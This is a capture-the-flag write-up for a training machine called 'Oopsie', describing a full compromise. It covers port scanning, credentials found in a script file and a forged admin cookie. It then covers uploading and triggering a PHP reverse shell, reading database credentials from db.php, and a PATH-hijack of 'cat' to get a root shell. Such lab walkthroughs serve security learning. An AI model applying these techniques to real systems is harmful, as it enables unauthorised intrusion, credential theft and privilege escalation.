Oopsie

Personal Rating: Easy

Enumeration

A first nmap scan reveals some open ports:

sudo nmap -sC <IP>

# 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
# 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome

At the webserver the directory /cdn-cgi was listable. The directory itself could be found by fuzzing for it with ffuf. I found /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js, which contained some credentials:

admin
MEGACORP_4dm1n!!
34322	admin	admin@megacorp.com
8832	john	john@tafcz.co.uk
86575	super admin	superadmin@megacorp.com

Web Access and Insecure Cookie Abuse

Logging in at the webserver at http://<TARGETIP>/cdn_cgi/login with the credentials I found, there was a file upload feature, that seemed to require higher permissions of some "super admin".

Since the page was PHP based and there was no session information in the URL, maybe there was a session cookie... I found the cookie, which was not a proper sessionID, but a custom string. In the public code of the /login/admin.php I found this:

if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575")

So I got privileged access to http://<TARGETIP>/cdn_cgi/login/admin.php?content=uploads&action=upload by loading that page with the cookie set to "34322".

Shell Access and Pillaging

At the upload page I could upload a PHP reverse shell and activate it with curl:

curl http://10.10.10.28/uploads/php-reverse-shell.php

The shell was as the user www-data. Running cat /var/www/html/cdn-cgi/login/db.php yielded the following credentials:

conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

As that user robert I could establish an ssh connection.

Insecure Relative Path

Checking the groups of the user I saw that robert had the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple strings bugtracker shew me this:

------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"

I created the file /home/robert/soos/cat which is a script that starts /bin/bash. Then I exported the directory to the PATH, so that my version of cat is used when calling cat without an absolute path:

export PATH=/home/robert/soos:$PATH

Executing the bugtracker binary now, I could start a root shell.

PreviousMarkupNextRedeemer

Last updated